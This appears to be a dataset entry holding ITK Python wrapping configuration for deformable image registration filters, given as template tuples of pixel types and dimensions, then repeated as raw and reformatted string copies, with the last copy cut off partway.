('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIUS3IUS3IVF43', True, 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,4 >,3 >'),
('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIF2IF2IVF22', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,2 >,2 >'),
('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIF3IF3IVF23', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,2 >,3 >'),
('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIF2IF2IVF32', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,3 >,2 >'),
('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIF3IF3IVF33', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,3 >,3 >'),
('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIF2IF2IVF42', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,4 >,2 >'),
('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIF3IF3IVF43', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,4 >,3 >'),
)
snake_case_functions = ('level_set_motion_registration_filter', 'pde_deformable_registration_filter', 'symmetric_forces_demons_registration_filter', 'demons_registration_filter', 'multi_resolution_pde_deformable_registration', )
| [
"depends = ('ITKPyBase', 'ITKRegistrationCommon', 'ITKFiniteDifference', )\ntemplates = (\n ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterISS2ISS2IVF22', True, 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,2 >,2 >'),\n ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterISS3ISS3IVF23', True, 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,2 >,3 >'),\n ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterISS2ISS2IVF32', True, 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,3 >,2 >'),\n ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterISS3ISS3IVF33', True, 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,3 >,3 >'),\n ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterISS2ISS2IVF42', True, 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,4 >,2 >'),\n ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterISS3ISS3IVF43', True, 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,4 >,3 >'),\n ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIUC2IUC2IVF22', True, 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,2 >,2 >'),\n ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIUC3IUC3IVF23', True, 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,2 >,3 >'),\n ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIUC2IUC2IVF32', True, 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,3 >,2 >'),\n ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIUC3IUC3IVF33', True, 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,3 >,3 >'),\n ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIUC2IUC2IVF42', True, 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,4 >,2 >'),\n ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIUC3IUC3IVF43', True, 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,4 >,3 >'),\n ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIUS2IUS2IVF22', True, 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,2 >,2 >'),\n ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIUS3IUS3IVF23', True, 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,2 >,3 >'),\n ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIUS2IUS2IVF32', True, 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,3 >,2 >'),\n ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIUS3IUS3IVF33', True, 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,3 >,3 >'),\n ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIUS2IUS2IVF42', True, 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,4 >,2 >'),\n ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIUS3IUS3IVF43', True, 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,4 >,3 >'),\n ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIF2IF2IVF22', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,2 >,2 >'),\n ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIF3IF3IVF23', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,2 >,3 >'),\n ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIF2IF2IVF32', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,3 >,2 >'),\n ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIF3IF3IVF33', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,3 >,3 >'),\n ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIF2IF2IVF42', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,4 >,2 >'),\n ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIF3IF3IVF43', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,4 >,3 >'),\n ('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterISS2ISS2IVF22', True, 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,2 >,2 >'),\n ('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterISS3ISS3IVF23', True, 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,2 >,3 >'),\n ('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterISS2ISS2IVF32', True, 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,3 >,2 >'),\n ('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterISS3ISS3IVF33', True, 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,3 >,3 >'),\n ('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterISS2ISS2IVF42', True, 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,4 >,2 >'),\n ('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterISS3ISS3IVF43', True, 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,4 >,3 >'),\n ('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIUC2IUC2IVF22', True, 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,2 >,2 >'),\n ('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIUC3IUC3IVF23', True, 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,2 >,3 >'),\n ('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIUC2IUC2IVF32', True, 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,3 >,2 >'),\n ('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIUC3IUC3IVF33', True, 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,3 >,3 >'),\n ('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIUC2IUC2IVF42', True, 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,4 >,2 >'),\n ('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIUC3IUC3IVF43', True, 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,4 >,3 >'),\n ('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIUS2IUS2IVF22', True, 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,2 >,2 >'),\n ('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIUS3IUS3IVF23', True, 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,2 >,3 >'),\n ('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIUS2IUS2IVF32', True, 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,3 >,2 >'),\n ('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIUS3IUS3IVF33', True, 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,3 >,3 >'),\n ('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIUS2IUS2IVF42', True, 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,4 >,2 >'),\n ('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIUS3IUS3IVF43', True, 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,4 >,3 >'),\n ('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIF2IF2IVF22', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,2 >,2 >'),\n ('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIF3IF3IVF23', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,2 >,3 >'),\n ('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIF2IF2IVF32', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,3 >,2 >'),\n ('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIF3IF3IVF33', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,3 >,3 >'),\n ('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIF2IF2IVF42', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,4 >,2 >'),\n ('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIF3IF3IVF43', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,4 >,3 >'),\n ('MultiResolutionPDEDeformableRegistration', 'itk::MultiResolutionPDEDeformableRegistration', 'itkMultiResolutionPDEDeformableRegistrationIF2IF2IVF22F', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,2 >, 2 >, float'),\n ('MultiResolutionPDEDeformableRegistration', 'itk::MultiResolutionPDEDeformableRegistration', 'itkMultiResolutionPDEDeformableRegistrationIF3IF3IVF33F', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,3 >, 3 >, float'),\n ('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterISS2ISS2IVF22', True, 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,2 >,2 >'),\n ('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterISS3ISS3IVF23', True, 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,2 >,3 >'),\n ('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterISS2ISS2IVF32', True, 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,3 >,2 >'),\n ('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterISS3ISS3IVF33', True, 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,3 >,3 >'),\n ('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterISS2ISS2IVF42', True, 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,4 >,2 >'),\n ('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterISS3ISS3IVF43', True, 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,4 >,3 >'),\n ('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIUC2IUC2IVF22', True, 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,2 >,2 >'),\n ('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIUC3IUC3IVF23', True, 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,2 >,3 >'),\n ('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIUC2IUC2IVF32', True, 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,3 >,2 >'),\n ('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIUC3IUC3IVF33', True, 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,3 >,3 >'),\n ('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIUC2IUC2IVF42', True, 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,4 >,2 >'),\n ('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIUC3IUC3IVF43', True, 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,4 >,3 >'),\n ('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIUS2IUS2IVF22', True, 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,2 >,2 >'),\n ('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIUS3IUS3IVF23', True, 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,2 >,3 >'),\n ('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIUS2IUS2IVF32', True, 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,3 >,2 >'),\n ('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIUS3IUS3IVF33', True, 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,3 >,3 >'),\n ('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIUS2IUS2IVF42', True, 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,4 >,2 >'),\n ('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIUS3IUS3IVF43', True, 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,4 >,3 >'),\n ('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIF2IF2IVF22', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,2 >,2 >'),\n ('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIF3IF3IVF23', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,2 >,3 >'),\n ('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIF2IF2IVF32', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,3 >,2 >'),\n ('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIF3IF3IVF33', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,3 >,3 >'),\n ('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIF2IF2IVF42', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,4 >,2 >'),\n ('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIF3IF3IVF43', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,4 >,3 >'),\n ('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterISS2ISS2IVF22', True, 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,2 >,2 >'),\n ('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterISS3ISS3IVF23', True, 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,2 >,3 >'),\n ('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterISS2ISS2IVF32', True, 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,3 >,2 >'),\n ('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterISS3ISS3IVF33', True, 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,3 >,3 >'),\n ('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterISS2ISS2IVF42', True, 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,4 >,2 >'),\n ('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterISS3ISS3IVF43', True, 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,4 >,3 >'),\n ('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIUC2IUC2IVF22', True, 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,2 >,2 >'),\n ('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIUC3IUC3IVF23', True, 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,2 >,3 >'),\n ('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIUC2IUC2IVF32', True, 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,3 >,2 >'),\n ('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIUC3IUC3IVF33', True, 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,3 >,3 >'),\n ('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIUC2IUC2IVF42', True, 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,4 >,2 >'),\n ('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIUC3IUC3IVF43', True, 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,4 >,3 >'),\n ('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIUS2IUS2IVF22', True, 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,2 >,2 >'),\n ('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIUS3IUS3IVF23', True, 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,2 >,3 >'),\n ('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIUS2IUS2IVF32', True, 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,3 >,2 >'),\n ('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIUS3IUS3IVF33', True, 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,3 >,3 >'),\n ('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIUS2IUS2IVF42', True, 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,4 >,2 >'),\n ('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIUS3IUS3IVF43', True, 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,4 >,3 >'),\n ('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIF2IF2IVF22', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,2 >,2 >'),\n ('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIF3IF3IVF23', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,2 >,3 >'),\n ('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIF2IF2IVF32', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,3 >,2 >'),\n ('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIF3IF3IVF33', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,3 >,3 >'),\n ('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIF2IF2IVF42', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,4 >,2 >'),\n ('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIF3IF3IVF43', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,4 >,3 >'),\n)\nsnake_case_functions = ('level_set_motion_registration_filter', 'pde_deformable_registration_filter', 'symmetric_forces_demons_registration_filter', 'demons_registration_filter', 'multi_resolution_pde_deformable_registration', )\n",
"depends = 'ITKPyBase', 'ITKRegistrationCommon', 'ITKFiniteDifference'\ntemplates = ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter',\n 'itkDemonsRegistrationFilterISS2ISS2IVF22', True,\n 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,2 >,2 >'\n ), ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter',\n 'itkDemonsRegistrationFilterISS3ISS3IVF23', True,\n 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,2 >,3 >'\n ), ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter',\n 'itkDemonsRegistrationFilterISS2ISS2IVF32', True,\n 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,3 >,2 >'\n ), ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter',\n 'itkDemonsRegistrationFilterISS3ISS3IVF33', True,\n 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,3 >,3 >'\n ), ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter',\n 'itkDemonsRegistrationFilterISS2ISS2IVF42', True,\n 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,4 >,2 >'\n ), ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter',\n 'itkDemonsRegistrationFilterISS3ISS3IVF43', True,\n 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,4 >,3 >'\n ), ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter',\n 'itkDemonsRegistrationFilterIUC2IUC2IVF22', True,\n 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, 